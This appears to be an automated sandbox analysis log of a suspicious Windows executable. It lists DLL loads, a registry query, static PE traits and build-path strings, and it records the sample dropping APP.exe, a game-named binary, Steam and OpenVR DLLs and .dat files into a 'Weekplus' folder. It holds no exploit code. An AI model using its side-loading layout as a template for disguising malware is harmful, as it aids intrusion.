Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wldp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: profapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wininet.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: amsi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dinput8.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winmm.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: inputhost.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: propsys.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: napinsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wshbth.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: nlaapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: hid.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: devobj.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ddraw.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dciman32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\openvr_api.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient64.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\steam_api64.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\APP.exe	Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: #U6c47#U8054#U652f#U4ed8.exe

Static file information: File size 23566848 > 1048576

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1675800

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\users\administrator\documents\visual studio 2010\Projects\LMNK\LMNK\obj\x64\Release\LMNK.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.000000000599F000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000000.2309175006.0000000000682000.00000002.00000001.01000000.00000007.sdmp, APP.exe.0.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbmlb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022BB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbw source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb` source: WERA028.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: XMM556.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2636400963.0000000027560000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdba$zzzdbg0 source: WERA028.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB,S source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C82000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\XMM556.pdb.pdb` source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA028.tmp.dmp.9.dr
Source:	Binary string: 0C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: [180n1 #U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Windows\XMM556.pdbpdb556.pdbl source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: ".pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbp source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C82000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdb source: GamePlusPlus.exe, 0000000A.00000000.2448572659.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2495342880.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466184660.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2453259450.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465406124.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2454237429.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000000.2456740595.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466011324.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: XMM556.pdbx source: WERA028.tmp.dmp.9.dr
